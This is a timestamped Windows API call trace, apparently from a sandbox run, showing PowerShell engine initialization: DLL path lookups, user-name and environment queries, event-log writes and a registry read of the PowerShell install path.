	[0299.951] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1ad080 | out: lpFileInformation=0x1ad080*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0299.951] SetErrorMode (uMode=0x1) returned 0x1
	[0299.951] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1acec0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0299.952] SetErrorMode (uMode=0x1) returned 0x1
	[0299.952] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1ad120 | out: lpFileInformation=0x1ad120*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0299.952] SetErrorMode (uMode=0x1) returned 0x1
	[0299.968] CoTaskMemAlloc (cb=0x804) returned 0x1b7022f0
	[0299.968] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7022f0, nSize=0x1ad528 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ad528) returned 0x1
	[0299.968] CoTaskMemFree (pv=0x1b7022f0) 
	[0299.968] CoTaskMemAlloc (cb=0x204) returned 0x383920
	[0299.968] GetUserNameW (in: lpBuffer=0x383920, pcbBuffer=0x1ad568 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1ad568) returned 1
	[0299.969] CoTaskMemFree (pv=0x383920) 
	[0299.969] ReportEventW (hEventLog=0x1b8d0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2dcc458*="FileSystem", lpRawData=0x2dcc1e8) returned 1
	[0300.444] CoTaskMemAlloc (cb=0x104) returned 0x3298d0
	[0300.444] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3298d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0300.444] CoTaskMemFree (pv=0x3298d0) 
	[0300.445] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ace00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0300.445] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0300.445] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0300.446] CoTaskMemAlloc (cb=0x804) returned 0x1b7022f0
	[0300.446] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7022f0, nSize=0x1ad528 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ad528) returned 0x1
	[0300.447] CoTaskMemFree (pv=0x1b7022f0) 
	[0300.447] CoTaskMemAlloc (cb=0x204) returned 0x383920
	[0300.447] GetUserNameW (in: lpBuffer=0x383920, pcbBuffer=0x1ad568 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1ad568) returned 1
	[0300.447] CoTaskMemFree (pv=0x383920) 
	[0300.447] ReportEventW (hEventLog=0x1b8d0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2dd2140*="Function", lpRawData=0x2dd1ed0) returned 1
	[0300.834] CoTaskMemAlloc (cb=0x104) returned 0x3298d0
	[0300.834] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3298d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0300.834] CoTaskMemFree (pv=0x3298d0) 
	[0301.276] CoTaskMemAlloc (cb=0x804) returned 0x1b7022f0
	[0301.276] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7022f0, nSize=0x1ad528 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ad528) returned 0x1
	[0301.277] CoTaskMemFree (pv=0x1b7022f0) 
	[0301.277] CoTaskMemAlloc (cb=0x204) returned 0x383920
	[0301.277] GetUserNameW (in: lpBuffer=0x383920, pcbBuffer=0x1ad568 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1ad568) returned 1
	[0301.277] CoTaskMemFree (pv=0x383920) 
	[0301.277] ReportEventW (hEventLog=0x1b8d0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e04518*="Registry", lpRawData=0x2e042a8) returned 1
	[0301.583] CoTaskMemAlloc (cb=0x804) returned 0x1b7022f0
	[0301.583] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7022f0, nSize=0x1ad528 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ad528) returned 0x1
	[0301.583] CoTaskMemFree (pv=0x1b7022f0) 
	[0301.583] CoTaskMemAlloc (cb=0x204) returned 0x383920
	[0301.583] GetUserNameW (in: lpBuffer=0x383920, pcbBuffer=0x1ad568 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1ad568) returned 1
	[0301.583] CoTaskMemFree (pv=0x383920) 
	[0301.584] ReportEventW (hEventLog=0x1b8d0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e09930*="Variable", lpRawData=0x2e096c0) returned 1
	[0301.584] CoTaskMemAlloc (cb=0x104) returned 0x3298d0
	[0301.584] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3298d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0301.584] CoTaskMemFree (pv=0x3298d0) 
	[0301.585] CoTaskMemAlloc (cb=0x104) returned 0x3298d0
	[0301.585] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3298d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0301.585] CoTaskMemFree (pv=0x3298d0) 
	[0301.606] CoTaskMemAlloc (cb=0x804) returned 0x32d240
	[0301.606] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x32d240, nSize=0x1ad528 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ad528) returned 0x1
	[0301.606] CoTaskMemFree (pv=0x32d240) 
	[0301.606] CoTaskMemAlloc (cb=0x204) returned 0x383920
	[0301.606] GetUserNameW (in: lpBuffer=0x383920, pcbBuffer=0x1ad568 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1ad568) returned 1
	[0301.606] CoTaskMemFree (pv=0x383920) 
	[0301.607] ReportEventW (hEventLog=0x1b8d0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e1d548*="Certificate", lpRawData=0x2e1d2d8) returned 1
	[0301.609] CoTaskMemAlloc (cb=0x104) returned 0x3298d0
	[0301.609] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3298d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0301.609] CoTaskMemFree (pv=0x3298d0) 
	[0301.610] CoTaskMemAlloc (cb=0x20e) returned 0x3d74d0
	[0301.610] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x3d74d0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0301.610] CoTaskMemFree (pv=0x3d74d0) 
	[0301.612] CoTaskMemAlloc (cb=0x104) returned 0x3298d0
	[0301.612] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3298d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0301.612] CoTaskMemFree (pv=0x3298d0) 
	[0301.612] CoTaskMemAlloc (cb=0x104) returned 0x3298d0
	[0301.612] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3298d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0301.612] CoTaskMemFree (pv=0x3298d0) 
	[0301.629] CoTaskMemAlloc (cb=0x104) returned 0x3298d0
	[0301.629] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3298d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0301.629] CoTaskMemFree (pv=0x3298d0) 
	[0302.340] CoTaskMemAlloc (cb=0x104) returned 0x3298d0
	[0302.340] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3298d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0302.340] CoTaskMemFree (pv=0x3298d0) 
	[0302.341] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1acf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0302.341] SetErrorMode (uMode=0x1) returned 0x1
	[0302.341] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1ad170 | out: lpFileInformation=0x1ad170*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0302.341] SetErrorMode (uMode=0x1) returned 0x1
	[0302.341] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1acf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0302.341] SetErrorMode (uMode=0x1) returned 0x1
	[0302.342] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1ad170 | out: lpFileInformation=0x1ad170*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0302.342] SetErrorMode (uMode=0x1) returned 0x1
	[0302.343] CoTaskMemAlloc (cb=0x104) returned 0x3298d0
	[0302.343] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3298d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0302.343] CoTaskMemFree (pv=0x3298d0) 
	[0302.351] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1ad0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0302.355] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1ad1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0302.355] SetErrorMode (uMode=0x1) returned 0x1
	[0302.355] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1ad430 | out: lpFileInformation=0x1ad430*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0302.355] SetErrorMode (uMode=0x1) returned 0x1
	[0302.992] CoTaskMemAlloc (cb=0x804) returned 0x32d240
	[0302.992] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x32d240, nSize=0x1ad798 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ad798) returned 0x1
	[0302.993] CoTaskMemFree (pv=0x32d240) 
	[0302.993] CoTaskMemAlloc (cb=0x204) returned 0x383920
	[0302.993] GetUserNameW (in: lpBuffer=0x383920, pcbBuffer=0x1ad7d8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1ad7d8) returned 1
	[0302.993] CoTaskMemFree (pv=0x383920) 
	[0302.993] ReportEventW (hEventLog=0x1b8d0008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e56230*="Available", lpRawData=0x2e55fc0) returned 1
	[0304.066] CoTaskMemAlloc (cb=0x104) returned 0x3298d0
	[0304.066] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3298d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0304.066] CoTaskMemFree (pv=0x3298d0) 
	[0304.067] CoTaskMemAlloc (cb=0x104) returned 0x3298d0
	[0304.067] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3298d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0304.067] CoTaskMemFree (pv=0x3298d0) 
	[0304.069] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.069] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.069] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.073] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad220, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.073] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.073] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.073] CoTaskMemAlloc (cb=0x104) returned 0x3298d0
	[0304.073] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x3298d0, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0304.074] CoTaskMemFree (pv=0x3298d0) 
	[0304.074] CoTaskMemAlloc (cb=0x104) returned 0x3298d0
	[0304.074] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x3298d0, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0304.074] CoTaskMemFree (pv=0x3298d0) 
	[0304.074] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad220, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.074] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.074] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.075] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad220, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.075] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.075] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.075] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad220, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.075] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.076] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.076] GetCurrentProcessId () returned 0x74c
	[0304.076] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad220, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.077] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.077] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.077] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.077] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.078] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.078] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.078] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.079] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.079] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad220, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.079] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.079] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.079] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad7b8 | out: phkResult=0x1ad7b8*=0x3b0) returned 0x0
	[0304.079] RegQueryValueExW (in: hKey=0x3b0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad73c, lpData=0x0, lpcbData=0x1ad738*=0x0 | out: lpType=0x1ad73c*=0x1, lpData=0x0, lpcbData=0x1ad738*=0x56) returned 0x0
	[0304.080] CoTaskMemAlloc (cb=0x5a) returned 0x3815d0
	[0304.080] RegQueryValueExW (in: hKey=0x3b0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad70c, lpData=0x3815d0, lpcbData=0x1ad708*=0x56 | out: lpType=0x1ad70c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ad708*=0x56) returned 0x0
	[0304.080] CoTaskMemFree (pv=0x3815d0) 
	[0304.080] RegCloseKey (hKey=0x3b0) returned 0x0
	[0304.080] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad220, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.080] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
